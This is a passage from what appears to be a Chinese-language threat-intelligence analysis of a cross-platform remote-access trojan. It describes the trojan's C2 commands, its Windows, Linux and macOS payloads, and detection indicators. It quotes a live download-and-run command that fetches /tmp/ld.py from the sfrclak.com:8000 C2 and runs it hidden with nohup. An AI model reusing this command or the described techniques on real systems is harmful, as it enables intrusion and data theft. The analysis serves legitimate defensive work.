leaf="">2)</span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">文件遍历与信息回传</span></span></span></span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">：遍历 %USERPROFILE%\Documents、Desktop、OneDrive、AppData\Roaming 等目录，并扩展遍历所有盘符，收集文件清单后回传 C2。</span></span></span></span></span></span></p><p data-mpa-md-key="common" style="margin-bottom: 16px;margin-top: 16px;font-size: 16px;color: rgb(51, 51, 51);text-align: center;"><span style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><span style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><span style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><span style="font-family: Calibri;font-variant: normal;text-transform: none;height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><span leaf="" style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><img class="rich_pages wxw-img" data-aistatus="1" data-ratio="0.6544943820224719" style="width: 581.34px;height: 380.49px;background-color: transparent;" data-w="712" src="https://wechat2rss.xlab.app/img-proxy/?k=bc3216e0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXIy8HSEkxHdC51OibibJUHNLmMJHonkQF30VS9ch5FdDNXyhfNvUB5ZGuSlaxJ6Pqs9NKdoR58s4RTXUrxzkrkWwId3R8pWQiaEHw%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialsy21dy"><span mpa-font-style="mneec5rg1o6x" style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">3)</span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">环境探测</span></span></span></span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">：回传运行进程列表、用户名、机器名、操作系统版本/类型、安装时间、时区、启动时间与当前时间、硬件型号等基础信息。</span></span></span></span></span></span></p><p data-mpa-md-key="common" style="margin-bottom: 16px;margin-top: 16px;font-size: 16px;color: rgb(51, 51, 51);text-align: center;"><span style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><span style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><span style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><span style="font-family: Calibri;font-variant: normal;text-transform: none;height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><span leaf="" style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><img class="rich_pages wxw-img" data-aistatus="1" data-ratio="0.5701357466063348" style="width: 581.34px;height: 331.44px;background-color: transparent;" data-w="663" src="https://wechat2rss.xlab.app/img-proxy/?k=ec661848&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXLIEswQeY4zklOsnibv9DCib2iapKqF1vEKWGIaWMuRaajv7dlG93ockw2Ta5PT0WnwT1g2W7qYeic22QvDjRujiaKXMBP0tRiayDzuo%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialsy1018"><span mpa-font-style="mneec5rgl0a" style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">4)</span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">反射注入（peinject）</span></span></span></span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">：当C2下发 type=peinject 指令时，载荷将下发的 shellcode 或 DLL 以反射方式注入至当前进程，实现内存驻留与更强的对抗能力。</span></span></span></span></span></span></p><p data-mpa-md-key="common" style="margin-bottom: 16px;margin-top: 16px;font-size: 16px;color: rgb(51, 51, 51);text-align: center;"><span style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><span style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><span style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><span style="font-family: Calibri;font-variant: normal;text-transform: none;height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><span leaf="" style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><img class="rich_pages wxw-img" data-aistatus="1" data-ratio="0.26181353767560667" style="width: 581.34px;height: 152.2px;background-color: transparent;" data-w="783" src="https://wechat2rss.xlab.app/img-proxy/?k=f82c3202&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXJnYN0uEJ7ibj64AGQacGQ5fSeh9ERThf4RVumVlFHROwA8FfUgTuochgDjxGTctxe2gURzbJNw0w5pyLqxgb178V4BTPgfnicTQ%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialsz17i2"><span mpa-font-style="mneec5rg12fw" style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">5)</span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">脚本执行（runscript）</span></span></span></span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">：当C2下发type=runscript指令时，执行其携带的脚本内容并回传结果。</span></span></span></span></span></span></p><p data-mpa-md-key="common" style="margin-bottom: 16px;margin-top: 16px;font-size: 16px;color: rgb(51, 51, 51);text-align: center;"><span style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><span style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><span style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><span style="font-family: Calibri;font-variant: normal;text-transform: none;height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><span leaf="" style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.44246353322528365" data-w="617" style="width: 581.34px;height: 257.22px;background-color: transparent;" src="https://wechat2rss.xlab.app/img-proxy/?k=1794360e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXJP1yicFEU7Wic79vthm4WLYj2KNSSwJuYTFSB8EShlfg8tmVwU2af5aF1T6FtoYqibMF088WFLJ6Q0G485ibmqhlm9RP1hicWtUXPE%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialsz18zv"><span mpa-font-style="mneec5rgzr4" style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">6)</span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">指定目录遍历（rundir）</span></span></span></span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">：当C2下发type=rundir指令时，遍历下发数据中指定目录并回传枚举结果。</span></span></span></span></span></span></p><p data-mpa-md-key="common" style="margin-bottom: 16px;margin-top: 16px;font-size: 16px;color: rgb(51, 51, 51);text-align: center;"><span style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><span style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><span style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><span style="font-family: Calibri;font-variant: normal;text-transform: none;height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><span leaf="" style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><img class="rich_pages wxw-img" data-aistatus="1" data-ratio="0.45826235093696766" style="width: 581.34px;height: 266.41px;background-color: transparent;" data-w="587" src="https://wechat2rss.xlab.app/img-proxy/?k=5b003ced&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXKGmCwnESeyOvSeZ81FcjNmqp2jh9s1YIktOcDNKA2xc18YFFVdFbfGiapUuG25oprw7dxVKotCyAPjO08Ufrcr8G1AwRabwADg%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialsz1vv0"><span mpa-font-style="mneec5rg14rf" style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;" lang="EN-US"><span leaf=""><span textstyle="" style="font-weight: bold;">3.4.3 </span></span><span leaf=""><span textstyle="" style="font-weight: bold;">检测与响应</span></span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf=""><span textstyle="" style="font-weight: bold;">方法</span></span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialsz1aqo"><span mpa-font-style="mneec5rgwlo" style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">•</span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">网络侧</span></span></span></span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">：重点关注对sfrclak.com:8000的POST出站通信与周期性beacon特征。</span></span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialsz1t94"><span mpa-font-style="mneec5rg1jdr" style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">•</span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">主机侧</span></span></span></span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">：</span></span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialsz118v"><span mpa-font-style="mneec5rg119k" style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">–</span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">注册表 HKCU\Software\Microsoft\Windows\CurrentVersion\Run 中的异常启动项（</span></span></span></span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">启动项</span></span></span></span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">名：MicrosoftUpdate）</span></span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialsz1s1p"><span mpa-font-style="mneec5rg13fg" style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">–</span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">%PROGRAMDATA% 目录下可疑批处理与可执行文件（如 wt.exe / system.bat）</span></span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialsz17tw"><span mpa-font-style="mneec5rg1kfm" style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">–</span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">临时目录中 6202033.ps1 的短时出现（结合 EDR/审计日志回溯）</span></span></span></span></span></span></p><div data-mpa-md-key="heading-2" style="display: flex;"><div style="display:flex;align-items:flex-start;"><p data-mpa-md-content="t" style="font-weight: 600;font-size: 17px;color: rgb(37, 37, 37);line-height: 28px;flex: 1 1 0%;text-align: left;" data-mpa-md-action-id="mneialsz1kcg"><span style=""><span style="font-variant: normal;text-transform: none;" lang="EN-US"><span leaf=""><span textstyle="" style="color: rgb(190, 25, 31);">3.5 Linux Python Payload 分析</span></span></span></span></p></div></div><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mneialszh4r"><span mpa-font-style="mneec5rg19ry" style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">本节对 Linux 阶段载荷（Python 远控木马）的行为分析，重点说明其在 Linux 环境下的</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">落地方式</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">与相较 Windows 载荷的</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">行为差异</span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">，用于支撑主机侧排查与应急响应。</span></span></span></span></span></p><p data-mpa-md-key="heading-3" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;font-weight: bold;" data-mpa-md-action-id="mneialszjiz"><span leaf="">3.5.1 载荷拉取与执行链</span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mneialsze8l"><span style="" mpa-font-style="mneec5rg6sd"><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">当攻击目标为 Linux 操作系统时，攻击链通常通过 /bin/sh 直接调用 curl 从 C2 下载 Python 脚本并在后台执行：</span></span></span></span></span></p><div data-mpa-md-key="blockquote" style="margin-bottom: 16px;margin-top: 16px;" data-mpa-md-template="30004"><div style="width: 100%;" data-mid=""><div style="background: #F4F4F4;width: 100%;padding: 16px;border-left: 2.5px solid #d03739;" data-mid=""><p data-mpa-md-content="t" style="font-size: 16px;color: rgb(51, 51, 51);text-align: justify;" data-mid="" data-mpa-md-action-id="mneialt01sz2"><span style="" mpa-font-style="mneec5rg1oxb"><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">/bin/sh</span></span></span></span><span style="" mpa-font-style="mneec5rgt80"><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">-c</span></span></span></span><span style="" mpa-font-style="mneec5rgmbf"><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">&#34;curl -o /tmp/ld.py -d packages.npm.org/product2 -s <a href="http://sfrclak.com:8000/6202033" target="_blank">http://sfrclak.com:8000/6202033</a> &amp;&amp; nohup python3 /tmp/ld.py <a href="http://sfrclak.com:8000/6202033" target="_blank">http://sfrclak.com:8000/6202033</a> &gt; /dev/null 2&gt;&amp;1 &amp;&#34;</span></span></span></span></p></div></div></div><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt01wch"><span mpa-font-style="mneec5rgnpy" style=""><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">要点</span></span></span></span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">：</span></span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt017g2"><span mpa-font-style="mneec5rg7wh" style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">•</span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">载荷落地路径为 /tmp/ld.py，并通过 nohup 后台运行，输出重定向到 /dev/null 以降低运行痕迹。</span></span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt014d0"><span mpa-font-style="mneec5rgdaz" style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">•</span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">C2 地址同样通过脚本参数传入（便于同一载荷复用与动态切换 C2）。</span></span></span></span></span></span></p><p data-mpa-md-key="heading-3" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;font-weight: bold;" data-mpa-md-action-id="mneialt01j7a"><span style="" mpa-font-style="mneec5rgkmu"><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;" lang="EN-US"><span leaf="">3.5.2 </span><span leaf="">与Windows载荷的关键差异</span></span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mneialt01idh"><span mpa-font-style="mneec5rg1j7m" style=""><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">综合样本行为可见，该 Linux Python 远控木马整体功能与 Windows PowerShell 载荷</span></span></span></span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">基本一致</span></span></span></span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">（信息探测、目录遍历、命令执行与回传等），但在两类指令上存在关键差别：</span></span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt010di"><span mpa-font-style="mneec5rg1hfz" style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">1)</span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">peinject 指令处理差异</span></span></span></span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">：Linux 侧不使用反射注入，而是将 C2 下发的 shellcode 保存为临时可执行文件，赋予执行权限后直接启动。</span></span></span></span></span></span></p><p data-mpa-md-key="common" style="margin-bottom: 16px;margin-top: 16px;font-size: 16px;color: rgb(51, 51, 51);text-align: center;"><span style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><span style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><span style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><span style="font-family: Calibri;font-variant: normal;text-transform: none;height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><span leaf="" style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><img class="rich_pages wxw-img" data-aistatus="1" data-ratio="0.6455696202531646" style="width: 581.34px;height: 375.3px;background-color: transparent;" data-w="711" src="https://wechat2rss.xlab.app/img-proxy/?k=80cb40be&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXIGKj82Qo57mTm5hIpBticib5iaA7zxydouBiaBhlxAgCC5uYTXor2ts2wpCgIsGSLT0VYicTl4bRf6UHbFn2LVdiaxaehNiaJPQOzNHM%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt0b4t"><span mpa-font-style="mneec5rgz14" style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">2)</span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">runscript 指令处理差异</span></span></span></span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">：Linux 侧倾向于使用反弹 shell（reverse shell）方式建立交互通道，而非在本地直接执行脚本文本并回传执行结果。</span></span></span></span></span></span></p><p data-mpa-md-key="common" style="margin-bottom: 16px;margin-top: 16px;font-size: 16px;color: rgb(51, 51, 51);text-align: center;"><span style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><span style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><span style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><span style="font-family: Calibri;font-variant: normal;text-transform: none;height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><span leaf="" style="height: auto;width: auto;max-height: none;max-width: none;min-height: auto;min-width: auto;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.7021897810218978" data-w="685" style="width: 581.34px;height: 408.21px;background-color: transparent;" src="https://wechat2rss.xlab.app/img-proxy/?k=79efd289&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXKAiaOTCfibMEEhbnh9gvgX8ia3Q2HoLD7pT5riczbic6fPfMRcbGHtJrA5rCnvgFc6tialQsGc61E5IhkTHw3rmmqcEdUTAzVV1mAiaQ%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></span></span></span></span></p><p data-mpa-md-key="heading-3" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;font-weight: bold;" data-mpa-md-action-id="mneialt039l"><span mpa-font-style="mneec5rgfc" style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;" lang="EN-US"><span leaf="">3.5.3 </span></span></span></span><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">检测与响应方式</span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt012p6"><span mpa-font-style="mneec5rgavq" style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">•</span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">网络侧</span></span></span></span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">：</span></span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt0uoa"><span mpa-font-style="mneec5rg254t" style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">–</span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">关注对 sfrclak.com:8000 的 POST 出站通信（与 Windows 类似）。</span></span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt018zb"><span mpa-font-style="mneec5rg1xo2" style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">–</span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">若出现反弹 shell 行为，需结合出口策略与 IDS/NetFlow 进一步排查异常外联。</span></span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt122t"><span mpa-font-style="mneec5rg1zf2" style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">•</span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;font-weight: bold;"><span leaf="">主机侧</span></span></span></span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">：</span></span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt11tf5"><span mpa-font-style="mneec5rgw9s" style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">–</span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">/tmp/ld.py 的创建与执行链（curl → python3 → nohup）</span></span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt112ln"><span mpa-font-style="mneec5rgc0s" style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">–</span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">/tmp/.&lt;随机&gt; 形式的可疑临时可执行文件（用于承载下发的 shellcode 并执行）</span></span></span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt1scb"><span mpa-font-style="mneec5rg10ii" style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">–</span></span><span style=""><span style=""><span style=""><span style="font-variant: normal;text-transform: none;"><span leaf="">关联进程树特征：sh/bash 拉起 curl 与 python3，并存在长期驻留的 Python 进程</span></span></span></span></span></span></p><div data-mpa-md-key="heading-2" style="display: flex;"><div style="display:flex;align-items:flex-start;"><p data-mpa-md-content="t" style="font-weight: 600;font-size: 17px;color: rgb(37, 37, 37);line-height: 28px;flex: 1 1 0%;text-align: left;" data-mpa-md-action-id="mneialt11iaa"><span style=""><span lang="EN-US"><span leaf="" mpa-font-style="mnehtv5w1tn5" style=""><span textstyle="" style="color: rgb(190, 25, 31);">3.6</span></span><span leaf="" mpa-font-style="mnehtv5w14m0" style=""><span textstyle="" style="color: rgb(190, 25, 31);">macOS Payload </span></span></span></span><span style="" mpa-font-style="mnehtv5wun3"><span lang="EN-US" style=""><span leaf=""><span textstyle="" style="color: rgb(190, 25, 31);">分析</span></span></span></span></p></div></div><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mneialt1bmh"><span mpa-font-style="mnehtv5wj51" style=""><span style=""><span lang="EN-US" style=""><span leaf="">本节对</span></span><span lang="EN-US"><span leaf=""> macOS </span></span></span><span style=""><span lang="EN-US" style=""><span leaf="">阶段载荷（落地文件：</span></span><span lang="EN-US"><span leaf="">/Library/Caches/com.apple.act.mond</span></span></span><span style=""><span lang="EN-US" style=""><span leaf="">）的行为分析，重点关注其在</span></span><span lang="EN-US"><span leaf=""> macOS </span></span></span><span style=""><span lang="EN-US" style=""><span leaf="">环境下的</span><b><span leaf="">落地执行链</span></b><span leaf="">与针对</span></span><span lang="EN-US"><span leaf=""> Gatekeeper </span></span></span><span style=""><span lang="EN-US" style=""><span leaf="">的</span><b><span leaf="">绕过策略</span></b><span leaf="">，用于支撑终端侧排查与应急响应。</span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;" data-mpa-md-action-id="mneialt16u9"><span mpa-font-style="mnehtv5wvfn"><span lang="EN-US"><span leaf="" style="font-variant: normal;text-transform: none;"><span textstyle="" style="font-weight: bold;">3.6.1 载荷拉取与执行链</span></span></span></span></p><p data-mpa-md-key="text" style="font-size: 16px;margin-bottom: 16px;color: rgb(51, 51, 51);margin-top: 16px;letter-spacing: 1px;text-align: justify;text-indent: 2em;" data-mpa-md-action-id="mneialt11y22"><span mpa-font-style="mnehtv5w1oug" style=""><span style=""><span style=""><span lang="EN-US" style=""><span leaf="">针对</span></span><span lang="EN-US"><span leaf=""> macOS </span></span></span></span><span style=""><span style=""><span lang="EN-US" style=""><span leaf="">目标时，攻击者通过</span></span><span lang="EN-US"><span leaf=""> curl </span></span></span></span><span style=""><span style=""><span lang="EN-US" style=""><span leaf="">从</span></span><span lang="EN-US"><span leaf=""> C2 </span></span></span></span><span style=""><span style=""><span lang="EN-US" style=""><span leaf="">下载载荷并保存到</span></span><span lang="EN-US"><span leaf=""> /Library/Caches/com.apple.act.mond </span></span></span></span><span style=""><span style=""><span lang="EN-US" style=""><span 